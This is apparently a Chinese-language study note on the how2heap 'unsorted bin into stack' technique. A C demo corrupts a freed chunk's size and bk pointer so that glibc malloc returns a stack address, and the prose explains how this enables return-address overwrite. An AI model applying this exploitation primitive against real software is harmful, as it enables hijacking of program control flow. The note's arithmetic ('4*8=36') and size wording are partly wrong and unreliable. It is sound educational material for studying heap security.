源代码

 1 #include <stdio.h>
 2 #include <stdlib.h>
 3 #include <stdint.h>
 4 
 5 int main() {
 6   intptr_t stack_buffer[4] = {0};
 7 
 8   fprintf(stderr, "Allocating the victim chunk\n");
 9   intptr_t* victim = malloc(0x100);
10 
11   fprintf(stderr, "Allocating another chunk to avoid consolidating the top chunk with the small one during the free()\n");
12   intptr_t* p1 = malloc(0x100);
13 
14   fprintf(stderr, "Freeing the chunk %p, it will be inserted in the unsorted bin\n", victim);
15   free(victim);
16 
17   fprintf(stderr, "Create a fake chunk on the stack");
18   fprintf(stderr, "Set size for next allocation and the bk pointer to any writable address");
19   stack_buffer[1] = 0x100 + 0x10;
20   stack_buffer[3] = (intptr_t)stack_buffer;
21 
22   //------------VULNERABILITY-----------
23   fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->size and victim->bk pointer\n");
24   fprintf(stderr, "Size should be different from the next request size to return fake_chunk and need to pass the check 2*SIZE_SZ (> 16 on x64) && < av->system_mem\n");
25   victim[-1] = 32;
26   victim[1] = (intptr_t)stack_buffer; // victim->bk is pointing to stack
27   //------------------------------------
28 
29   fprintf(stderr, "Now next malloc will return the region of our fake chunk: %p\n", &stack_buffer[2]);
30   fprintf(stderr, "malloc(0x100): %p\n", malloc(0x100));
31 }

运行结果

先在栈上申请4*8=36=0x20字节的空间stack

然后申请两个100字节的堆victim，p1

p1是防止victim释放后和top chunk合并

释放victim，大于fastbin要求，所以进入unsort bin

 

接着将stack伪造成一个堆

将stack的size赋值为0x110

 bk指向任意可写地址，这里将其指向stack起始地址

然后将堆victim的size修改为32=0x20字节   (要满足(> 16 on x64) && < av->system_mem）的要求

将victim的bk修改为指向stack

此时victim还在unsort bin中

unsorted bin实际是 victim->stack->null

此时再申请一个0x100字节的堆

首先到unsorted bin中寻找

先找到victim 由于victim0>size被修改为了0x20，不满足大小要求，遍历victim->bk所指堆

于是找到stack ，大小满足，bk所指也为可写空间，满足条件，所以从链表中取出stack来分配

这就利用了unsorted bin的特性，使堆分配到了栈里

如果此时可以向堆里写入内容，即可覆盖栈中变量即返回地址